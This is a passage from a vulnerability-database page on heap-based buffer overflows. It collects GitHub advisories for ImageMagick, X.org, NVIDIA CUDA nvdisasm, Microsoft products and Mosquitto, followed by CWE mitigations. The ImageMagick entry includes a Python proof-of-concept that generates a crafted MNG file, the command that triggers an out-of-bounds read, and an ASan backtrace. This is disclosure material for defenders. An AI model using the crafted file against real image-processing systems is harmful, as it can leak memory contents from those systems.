pixels=prev;\n                    n=next;\n                    q=GetAuthenticPixels(large_image,0,yy,large_image-\u003ecolumns,\n                      1,exception);\n                    if (q == (Quantum *) NULL)\n                      break;\n                    q+=(ptrdiff_t) (large_image-\u003ecolumns-image-\u003ecolumns)*\n                      GetPixelChannels(large_image);\n\n                    for (x=(ssize_t) image-\u003ecolumns-1; x \u003e= 0; x--)\n                    {\n                      /* To do: get color as function of indexes[x] */\n                      /*\n                      if (image-\u003estorage_class == PseudoClass)\n                        {\n                        }\n                      */\n\n                      if (magn_methy \u003c= 1)\n                        {\n                          /* replicate previous */\n                          SetPixelRed(large_image,GetPixelRed(image,pixels),q);  // [5]\n                          SetPixelGreen(large_image,GetPixelGreen(image,\n                             pixels),q);\n                          SetPixelBlue(large_image,GetPixelBlue(image,\n                             pixels),q);\n                          SetPixelAlpha(large_image,GetPixelAlpha(image,\n                             pixels),q);\n                        }\n```\n\nThis can likely be used to leak subsequent memory contents into the output image.\n\nThe attached proof-of-concept triggers this issue and is not blocked by any of the default security policies.\n\n## **Affected Version(s)**\n\nThe issue has been successfully reproduced:\n\n- at commit `3e37a7f15fcb1aa80e6beae3898e684309c2ecbe`\n\n- in stable release `7.1.2-0`\n\n### **Build Instructions**\n\n```shell\ngit clone https://github.com/imagemagick/imagemagick\n\ncd imagemagick\n\nexport CC=clang\nexport CXX=clang++\nexport CFLAGS=\"-fsanitize=address -O0 -ggdb\"\nexport CXXFLAGS=\"-fsanitize=address -O0 -ggdb\"\nexport LDFLAGS=\"-fsanitize=address -O0 -ggdb\"\n\n./configure --disable-shared --disable-docs --with-jxl\nmake -j\n```\n\n## **Reproduction**\n\n### **Test Case**\n\nThis testcase is a python script that will generate an MNG file which can be used to trigger the vulnerability.\n\n```\nimport struct\nimport zlib\n\ndef chunk(tag, data):\n    crc = zlib.crc32(tag + data) \u0026 0xffffffff\n    return struct.pack(\u0027\u003eI\u0027, len(data)) + tag + data + struct.pack(\u0027\u003eI\u0027, crc)\n\n# Simple 128x1 RGB jpeg\njpeg = bytes([\n  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01,\n  0x01, 0x01, 0x01, 0x2c, 0x01, 0x2c, 0x00, 0x00, 0xff, 0xdb, 0x00, 0x43,\n  0x00, 0x03, 0x02, 0x02, 0x03, 0x02, 0x02, 0x03, 0x03, 0x03, 0x03, 0x04,\n  0x03, 0x03, 0x04, 0x05, 0x08, 0x05, 0x05, 0x04, 0x04, 0x05, 0x0a, 0x07,\n  0x07, 0x06, 0x08, 0x0c, 0x0a, 0x0c, 0x0c, 0x0b, 0x0a, 0x0b, 0x0b, 0x0d,\n  0x0e, 0x12, 0x10, 0x0d, 0x0e, 0x11, 0x0e, 0x0b, 0x0b, 0x10, 0x16, 0x10,\n  0x11, 0x13, 0x14, 0x15, 0x15, 0x15, 0x0c, 0x0f, 0x17, 0x18, 0x16, 0x14,\n  0x18, 0x12, 0x14, 0x15, 0x14, 0xff, 0xdb, 0x00, 0x43, 0x01, 0x03, 0x04,\n  0x04, 0x05, 0x04, 0x05, 0x09, 0x05, 0x05, 0x09, 0x14, 0x0d, 0x0b, 0x0d,\n  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,\n  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,\n  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,\n  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,\n  0x14, 0x14, 0xff, 0xc0, 0x00, 0x11, 0x08, 0x00, 0x01, 0x00, 0x80, 0x03,\n  0x01, 0x11, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, 0xff, 0xc4, 0x00,\n  0x15, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0xff, 0xc4, 0x00, 0x14,\n  0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x01, 0x01,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x11, 0x01, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0xff, 0xda, 0x00, 0x0c, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03,\n  0x11, 0x00, 0x3f, 0x00, 0xaa, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n  0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0xd9\n])\n\n# MNG File Construction\nmng_sig = b\u0027\\x8aMNG\\r\\n\\x1a\\n\u0027\nmhdr_data = struct.pack(\u0027\u003eIIIIIII\u0027, 1, 1, 1, 0, 0, 0, 0)\nmhdr_chunk = chunk(b\u0027MHDR\u0027, mhdr_data)\nmagn_data = struct.pack(\u0027\u003eHH B H H H H H H B\u0027, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1)\nmagn_chunk = chunk(b\u0027MAGN\u0027, magn_data)\njhdr_data = struct.pack(\u0027\u003eIIBBBBBBBB\u0027, 128, 1, 12, 8, 8, 0, 8, 0, 0, 0)\njhdr_chunk = chunk(b\u0027JHDR\u0027, jhdr_data)\njdat_chunk = chunk(b\u0027JDAT\u0027, jpeg)\nscanlines = b\u0027\\x00\\x00\u0027*128\ncompressed_scanlines = zlib.compress(scanlines)\nidat_chunk = chunk(b\u0027IDAT\u0027, compressed_scanlines)\niend_chunk = chunk(b\u0027IEND\u0027, b\u0027\u0027)\nmend_chunk = chunk(b\u0027MEND\u0027, b\u0027\u0027)\nmng_bytes = mng_sig + mhdr_chunk + magn_chunk + jhdr_chunk + jdat_chunk + idat_chunk + iend_chunk + mend_chunk\n\nwith open(\"magn_read.mng\", \"wb\") as tmp:\n    tmp.write(mng_bytes)\n```\n\n### **Command**\n\n```shell\npython3 ./generate_testcase.py\nutilities/magick ./magn_read.mng -resize 200x200 PNG:output.png\n```\n\n### **ASan Backtrace**\n\n```\n=================================================================\n==1562409==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51b000000680 at pc 0x557a486b0c64 bp 0x7ffe63210de0 sp 0x7ffe63210dd8\nREAD of size 4 at 0x51b000000680 thread T0\n    #0 0x557a486b0c63 in GetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10\n    #1 0x557a4869ce03 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:51\n    #2 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9\n    #3 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15\n    #4 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9\n    #5 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22\n    #6 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7\n    #7 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13\n    #8 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5\n    #9 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14\n    #10 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10\n    #11 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10\n    #12 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16\n    #13 0x7f1431833d64 in __libc_start_main csu/../csu/libc-start.c:360:3\n    #14 0x557a481a0790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f3790) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3)\n\n0x51b000000680 is located 0 bytes after 1536-byte region [0x51b000000080,0x51b000000680)\nallocated by thread T0 here:\n    #0 0x557a482405c3 in malloc (/tmp/repro/imagemagick/utilities/magick+0x2935c3) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3)\n    #1 0x557a482b9b6a in AcquireMagickMemory /tmp/repro/imagemagick/MagickCore/memory.c:559:10\n    #2 0x557a482b9dba in AcquireQuantumMemory /tmp/repro/imagemagick/MagickCore/memory.c:677:10\n    #3 0x557a4869c58c in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6584:34\n    #4 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9\n    #5 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15\n    #6 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9\n    #7 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22\n    #8 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7\n    #9 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13\n    #10 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5\n    #11 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14\n    #12 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10\n    #13 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10\n    #14 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 in GetPixelRed\nShadow bytes around the buggy address:\n  0x51b000000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=\u003e0x51b000000680:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x51b000000700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x51b000000780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x51b000000900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n==1562409==ABORTING\n```\n\n## **Reporter Credit**\n\nGoogle Big Sleep",
  "id": "GHSA-cjc8-g9w8-chfw",
  "modified": "2025-08-25T15:58:41Z",
  "published": "2025-08-25T15:58:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cjc8-g9w8-chfw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55004"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ImageMagick/ImageMagick"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0"
    },
    {
      "type": "WEB",
      "url": "https://goo.gle/bigsleep"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "imagemagick: heap-buffer overflow read in MNG magnification with alpha"
}

GHSA-CJCF-6CH6-G3RX

Vulnerability from github – Published: 2024-10-30 09:30 – Updated: 2025-08-04 21:30
VLAI
Details

A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9632"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-30T08:15:04Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.",
  "id": "GHSA-cjcf-6ch6-g3rx",
  "modified": "2025-08-04T21:30:38Z",
  "published": "2024-10-30T09:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9632"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00031.html"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2317233"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2024-9632"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:7458"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:7165"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:7163"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:12751"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9901"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9820"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9819"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9818"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9816"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9690"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9601"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9579"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:9540"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:8798"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:10090"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Oct/20"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/10/29/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CJJP-VVW5-Q784

Vulnerability from github – Published: 2025-09-24 15:31 – Updated: 2025-11-03 21:34
VLAI
Details

NVIDIA CUDA Toolkit for all platforms contains a vulnerability in nvdisasm where an attacker may cause a heap-based buffer overflow by getting the user to run nvdisasm on a malicious ELF file. A successful exploit of this vulnerability may lead to arbitrary code execution at the privilege level of the user running nvdisasm.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-23308"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-24T14:15:47Z",
    "severity": "LOW"
  },
  "details": "NVIDIA CUDA Toolkit for all platforms contains a vulnerability in nvdisasm where an attacker may cause a heap-based buffer overflow by getting the user to run nvdisasm on a malicious ELF file. A successful exploit of this vulnerability may lead to arbitrary code execution at the privilege level of the user running nvdisasm.",
  "id": "GHSA-cjjp-vvw5-q784",
  "modified": "2025-11-03T21:34:35Z",
  "published": "2025-09-24T15:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23308"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5661"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-23308"
    },
    {
      "type": "WEB",
      "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2204"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CJM7-R96J-5XX3

Vulnerability from github – Published: 2024-04-09 18:30 – Updated: 2024-04-09 18:30
VLAI
Details

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-28915"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-09T17:15:51Z",
    "severity": "HIGH"
  },
  "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability",
  "id": "GHSA-cjm7-r96j-5xx3",
  "modified": "2024-04-09T18:30:27Z",
  "published": "2024-04-09T18:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28915"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28915"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CJQX-7VG8-MM6C

Vulnerability from github – Published: 2026-07-14 18:32 – Updated: 2026-07-14 18:32
VLAI
Details

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-58618"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-14T17:17:13Z",
    "severity": "HIGH"
  },
  "details": "Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.",
  "id": "GHSA-cjqx-7vg8-mm6c",
  "modified": "2026-07-14T18:32:12Z",
  "published": "2026-07-14T18:32:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58618"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58618"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CM54-MPRW-5279

Vulnerability from github – Published: 2024-10-30 12:31 – Updated: 2025-11-03 21:31
VLAI
Details

In Eclipse Mosquitto, from version 1.3.2 through 2.0.18, if a malicious broker sends a crafted SUBACK packet with no reason codes, a client using libmosquitto may make out of bounds memory access when acting in its on_subscribe callback. This affects the mosquitto_sub and mosquitto_rr clients.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-10525"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-30T12:15:02Z",
    "severity": "HIGH"
  },
  "details": "In Eclipse Mosquitto, from version 1.3.2 through 2.0.18, if a malicious broker sends a crafted SUBACK packet with no reason codes, a client using libmosquitto may make out of bounds memory access when acting in its on_subscribe callback. This affects the mosquitto_sub and mosquitto_rr clients.",
  "id": "GHSA-cm54-mprw-5279",
  "modified": "2025-11-03T21:31:29Z",
  "published": "2024-10-30T12:31:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10525"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eclipse-mosquitto/mosquitto/commit/8ab20b4ba4204fdcdec78cb4d9f03c944a6e0e1c"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/190"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00022.html"
    },
    {
      "type": "WEB",
      "url": "https://mosquitto.org/blog/2024/10/version-2-0-19-released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-CM62-WJRC-9GQM

Vulnerability from github – Published: 2026-07-14 18:32 – Updated: 2026-07-14 18:32
VLAI
Details

Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-54993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-14T17:17:07Z",
    "severity": "HIGH"
  },
  "details": "Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code locally.",
  "id": "GHSA-cm62-wjrc-9gqm",
  "modified": "2026-07-14T18:32:08Z",
  "published": "2026-07-14T18:32:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54993"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54993"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation

Pre-design: Use a language or compiler that performs automatic bounds checking.

Mitigation
Architecture and Design

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Mitigation MIT-10
Operation Build and Compilation

Strategy: Environment Hardening

  • Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking.
  • D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail.
Mitigation MIT-11
Operation Build and Compilation

Strategy: Environment Hardening

  • Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.
  • Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking.
  • For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335].
Mitigation
Implementation

Implement and perform bounds checking on input.

Mitigation
Implementation

Strategy: Libraries or Frameworks

Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary.

Mitigation
Operation

Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth.

CAPEC-92: Forced Integer Overflow

This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.